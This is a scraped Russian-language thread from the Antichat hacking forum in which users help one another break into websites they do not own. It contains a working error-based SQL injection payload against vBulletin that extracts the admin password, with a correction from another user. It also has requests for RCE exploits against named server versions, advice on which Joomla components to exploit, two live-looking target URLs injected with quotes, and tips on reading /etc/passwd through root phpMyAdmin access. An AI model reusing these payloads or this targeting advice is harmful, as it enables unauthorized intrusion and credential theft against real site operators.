ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
07.12.2015, 22:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
8491
Репутация:
7
|
|
Сообщение от UNIXTREID
UNIXTREID said:
↑
Извиняюсь за вопросы, гуглил, но как-то выдача не удалась.
..
1)Есть ли какие-то недавние рабочие RCE под такие сервисы???
nginx 1.6.2
Microsoft IIS 6.0
ASP.NET 1.1.4322
ASP.NET 2.0.50727
2)И ещё один вопрос:
зависят ли как-то версии компонентов Joomla от основной версии самой Joomla ???
Существуют ли какие-то удобные, к примеру, таблицы, где чётко сопоставляются версия компонента с версией самой CMS ??? Или компоненты обновляются только с версией CMS ? Просто чтобы раскручивать сайт, узнал версию джумлы и её установленные дополнения, вот и думаю, по какой версии подбирать эксплоит...
P.S. Чтобы не создавать нового сообщения, спрошу здесь же: )))
Joomla 2.5.7
Component: com_content
Component: com_jce
Component: com_jdownloads
Component: com_newsfeeds
Component: com_users
Component: com_xmap
Есть ли смысл и варианты ??? По первому вопросу - топаем на exploit-db и узнаем все через поиск, по второму вопросу, да, версия компонентов зависит от версии джумлы, кстати, com_jdownloads и com_xmap компоненты сторонние, в com_xmap дыр нет.
|
|
|
|
08.12.2015, 00:34
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от RWD
RWD said:
↑
вообще реально залить файл если sql time based blind? права mysql root да, реально. https://rdot.org/forum/showthread.php?t=60
Сообщение от BlitzXX
BlitzXX said:
↑
XSS:
фильтра нету,
Максимальное кол-во символов 32.
Как сделать?
Нахождение:
Код:
Code:
[XSS] бла-бла-бла...
Делал так, запрос идет, но не выполняется сам скрипт xss'ки. Проблема в (его нету)
нужен домен из трех символов.
|
|
|
08.12.2015, 15:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
104689
Репутация:
1
|
|
В общем такой вопрос взламываю способом
.SpoilerTarget" type="button">Spoiler: Скрипт
securitytoken=guest&humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=p rocess&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
В ошибке должен выходить pass (без соли на это другой скрипт)
Но выходит такая годня почему ?
Даже если соль хочу вывести всё ровно такая хрень
и это не единственный сайт где такие траблы
vBulletin |
|
|
|
08.12.2015, 17:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
300820
Репутация:
90
|
|
Сообщение от Sensoft
Sensoft said:
↑
В общем такой вопрос взламываю способом
Spoiler: Скрипт
securitytoken=guest&humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=p rocess&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
В ошибке должен выходить pass (без соли на это другой скрипт)
Но выходит такая годня почему ?
Даже если соль хочу вывести всё ровно такая хрень
и это не единственный сайт где такие траблы
vBulletin так красным по белому же написано что таблицы user нет, information_schema рекомендую глянуть
|
|
|
|
11.12.2015, 15:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
40787
Репутация:
1
|
|
Сообщение от profishell
profishell said:
↑
По первому вопросу - топаем на exploit-db и узнаем все через поиск, по второму вопросу, да, версия компонентов зависит от версии джумлы, кстати, com_jdownloads и com_xmap компоненты сторонние, в com_xmap дыр нет. profishell, поискал на великом exploit-db:
1.По nginx есть сплоиты, но версия раньше, чем 1.6.2 (Максимум, что там есть - 1.4.0)
2.Microsoft IIS 6.0 - целая пачка, но из них несколько DoS'ов , другие какие-то старые...
3.По ASP.NET тоже половину старые, что есть нормального, то или DoS, или Padding Oracle.
По Jooml'е спасибо, буду знать. Но есть ли дыры в других компонентах, нежели com_jdownloads или com_xmap??? Я где-то видел, что com_users можно раскрутить, да и компонент распространённый. Com_newsfeeds тоже довольно интересный
|
|
|
|
13.12.2015, 16:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
36068
Репутация:
0
|
|
Ребят, кто работал по coldfusion, что-нибудь можно сделать? Какие-то нестандартные sql версии. Ну, то есть, не MSSQL/MySQL/Oracle(?) Подскажите действия... К примеру:
Код:
Code:
http://borsariimages.com/archive/public/AssetDetail.cfm?aid=S-AAS-414-PB&lid=1%27&rdir=lightboxes&rpage=ViewLightboxContents&orig=p
Код:
Code:
http://178.63.177.70/huber/huber/images/showPicture.cfm?imgNo=77447141%27&language=1
|
|
|
|
14.12.2015, 16:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
238786
Репутация:
40
|
|
Всем привет. Давно я вам тут глупых вопросов не задавал, надо наверстать.
Сложилась такая штуковина есть доступ к myadmin с правами рута, всё как надо, но вот засада , нету пути, phpinfo и при выполнение команды selecl load_file('etc/passwd'); отдаётся хрень. Есть Но не НАЛ. фото
.SpoilerTarget" type="button">Spoiler
Ну да вопросы, как найти путь? Как заставить читать файлы. Мысли только подключатся с консоли и пробовать разные варианты, брут в ручную с путями var/www/site var/www/public_html/site/... может есть что-то универсальное |
|
|
|
15.12.2015, 00:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
238786
Репутация:
40
|
|
Сообщение от palec2006
palec2006 said:
↑
параметры нажми, всё там спасибо , решили так, записали вывод в таблицу
|
|
|
|
15.12.2015, 23:31
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от palec2006
palec2006 said:
↑
параметры нажми, всё там Еще один способ ( я описывал)
Если сервер на фряхе, то при запрсое select load file('/') , то показывает все папки в корне и так далее.
|
|
|
|
16.12.2015, 15:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
98300
Репутация:
31
|
|
Народ, кто Metasploit юзает, как задать пейлоад для выполнение кастомного php-кода, а не реверс коннект?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
